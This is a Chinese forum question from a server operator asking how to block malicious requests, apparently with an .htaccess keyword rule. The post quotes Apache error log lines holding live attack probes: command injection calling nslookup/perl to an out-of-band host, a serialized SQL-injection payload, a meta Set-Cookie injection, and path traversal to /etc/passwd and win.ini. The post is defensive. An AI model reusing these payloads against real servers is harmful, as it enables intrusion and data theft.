我已经分析了我的服务器日志一个星期了,我发现了一些恶意的请求,我想知道是否有可能保护它,因为我不知道我应该做什么,我唯一的想法是创建一个 .htaccess 规则来阻止服务器请求中的某些词,比如gethostbyname
,但我不知道它是如何工作的,也不知道它是否有效
[Tue Nov 03 04:14:53.839367 2020] [core:error] [pid 467:tid 140016219035392] (36)File name too long: [client 164.68.125.18:17324] AH00036: access to /;(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")|(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")&(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")/purchase-saq/ failed (filesystem path '/var/www/master/;(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")|(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")&(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")')
[Tue Nov 03 02:08:23.783130 2020] [proxy_fcgi:error] [pid 470:tid 140015933847296] [client 172.28.116.14:44214] AH01071: Got error 'Primary script unknown\n'
[Tue Nov 03 07:10:02.996899 2020] [proxy_fcgi:error] [pid 23788:tid 140014927214336] [client 164.68.112.10:5403] AH01071: Got error 'Primary script unknown\n', referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'/*";s:3:"num";s:141:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca
[Tue Oct 27 19:58:25.368520 2020] [core:error] [pid 29512:tid 140476501980928] [client 3.132.217.50:33028] AH00126: Invalid URI in request GET <meta%20http-equiv=Set-Cookie%20content=%22testjpjn=6754%22> HTTP/1.1
[Tue Oct 27 19:58:25.030965 2020] [core:error] [pid 29507:tid 140476592264960] [client 3.132.217.50:35560] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Tue Oct 27 19:58:20.439013 2020] [core:error] [pid 29652:tid 140476317406976] [client 3.132.217.50:32968] AH00126: Invalid URI in request GET //../../../../../../../../../../../../etc/passwd HTTP/1.1
[Tue Oct 27 22:10:29.240575 2020] [core:error] [pid 29568:tid 140475990255360] [client 3.132.217.74:47570] AH00126: Invalid URI in request GET ../../../../../../../../../../../../winnt/win.ini HTTP/1.1
请问你能帮帮我吗?